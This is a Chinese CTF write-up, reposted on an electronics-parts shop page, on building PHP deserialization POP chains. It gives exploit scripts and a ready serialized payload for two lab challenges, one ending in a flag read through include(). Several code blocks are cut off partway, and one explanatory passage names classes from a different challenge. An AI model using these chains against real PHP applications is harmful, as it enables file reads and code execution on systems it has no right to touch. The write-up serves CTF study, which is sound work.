锐单电子商城 , 一站式电子元器件采购平台!

  • 电话:400-990-0325

购物车

pop构造链表(细节)

时间:2023-01-17 22:00:00 5w33kr电阻5w33r精密电阻

现在学的是如何构建链表,找链子,找链子的魔法方法一定要特别清楚

__construct() 一个对象创建时被调用,
__destruct() 当一个对象被销毁时,它被调用,
__toString() 当对象被调用为字符串时。
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__destruct() 当物体被销毁时触发
__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于读取从访问的属性读取数据
__set() 将数据写入不可访问的属性
__isset() 调用不可访问属性isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__toString() 当使用类作为字符串时,需要触发返回值
__invoke() 当脚本试图将对象调用为函数时触发

admin === 'w44m' && $this->passwd ==='08067'){             include('flag.php');             echo $flag;         }else{             echo $this->admin;             echo $this->passwd;             echo 'nono';         }     } }  class w22m{     public $w00m;     public function __destruct(){         echo $this->w00m;     } }  class w33m{     public $w00m;     public $w22m;     public function __toString(){         $this->w00m->{$this->w22m}();         return 0;     } }  $w00m = $_GET['w00m']; unserialize($w00m);  ?>

首先,首先找到起点和终点,终点通常是一些执行函数,如eval,看见了include(flag.php)确定终点,起点是 _destruct

看了一圈,发现了w33m类中的__toString()有一个函数调用,类名和函数名都是变量,所以这个__toString() 就和Getflag()连接起来,向前推,触发__toString()条件是当一个对象被视为字符串时,一眼就能看到w22m中__destruct()

w22m-->>destruct w33m-->>tostring getflag构造好了

然后看见admin是private定义,直接在里面构建

w00m=$b; $b->w00m=$c; $b->w22m="Getflag"; echo urlencode(serialize($a));   ?>

解法二,内部结构

error_reporting(0);
class w44m{

private $admin = 'w44m';
protected $passwd = '08067';

}

class w22m{
public $w00m;
public function __construct(){
$this->w00m=new w33m();
}
}

class w33m{
public $w00m;
public $w22m;
public function __construct(){
$this->w00m=new w44m();
$this->w22m="Getflag";
}
}

$a=new w22m();
echo urlencode(serialize($a));

?>

如果属性不是,第二果属性不是public只能在里面结构,需要改成——construct可以串通,第一个更清晰,因为这是我第一次在类前添加构造$,this前 还需要添加,否则类型不匹配,

O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{s:11:"w44madmin";s:4:"w44m";s:9:"*passwd";s:5:"08067";}s:4:"w22m";s:7:"Getflag";}}

因为不是public属性,所以前面的不显示,需要url加密即可

一般都是contruct然后是destruct,因为调用中的属性是执行的destruct

看另一道题

[NISACTF 2022]popchains

也是一道pop题目

Happy New Year~ MAKE A WISH ';  if(isset($_GET['wish'])){     @unserialize($_GET['wish']); } else{     $a=new Road_is_Long;     highlight_file(__FILE__); } /***************************pop your 2022*****************************/  class Road_is_Long{     public $page;     public $string;     public function __construct($file='index.php'){         $this->page = $file;     }     public function __toString(){         return $this->string->page;     }      public function __wakeup(){         if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {             echo "You can Not Enter 2022";             $this->page = "index.php";         }     } }  class Try_Work_Hard{     protected  $var;     public function append($value){         include($value);     }     public function __invoke(){         $this->append($this->var);     } }  class Make_a_Change{     public $effort;     public function __construct(){         $this->effort = array();     }      public function __get($key){         $function = $this->effort;         return $function();     } } /**********************Try to See flag.php*****************************/

用到的魔术方法

__construct 一个对象创建时被调用,
__toString 当一个对象被调整为一个字符串时。
__wakeup()   使用unserialize时触发
__get()    用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有初始化的属性
__invoke()   当脚本尝试将对象调用为函数时触发 

同样先找尾巴,看见了

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

include($value)这肯定是尾巴,然后看见同类中的invoke魔术方法,里面调用了append,然后寻找龙头反序列化,那肯定是wakeup,看见wakeup里面使用了正则字符串,自动调用tostring,return $this->string->page;  string  page单别都是里面的一个属性,这样就会调用错误,然后相应——get方法,

  $function = $this->effort;
        return $function();  把对象看为属性引用

自动调用 invoke,然后invoke里面调用append结束

1.__wakeup()方法通过preg_match()将$this->source做字符串比较,如果$this->source是Show类,就调用了__toString()方法;
2.__toString()访问了str的source属性,如果str是Test类,则不存在source属性,所以调用了Test类的__get()魔术方法;
3.__get()方法将对象p作为函数使用,p实例化为Modify类,就调用了Modifier的__invoke()方法;

Modifier::__invoke()<--Test::__get()<--Show::__toString()

 开始构造

page=$Road2;
    $Road2->string=$Make;
    $Make->effort=$Try;
 
  echo urlencode(serialize($Road1));
?>

不知道为什么/flag就对,flag.php就不对

到此结束了,以后碰见了继续研究

# /flag和flag.php是两个完全不同的文件,

/flag是根目录下的一个flag的文件

flag.php是当前目录下的php文件,别混淆!

锐单商城拥有海量元器件数据手册IC替代型号,打造电子元器件IC百科大全!

相关文章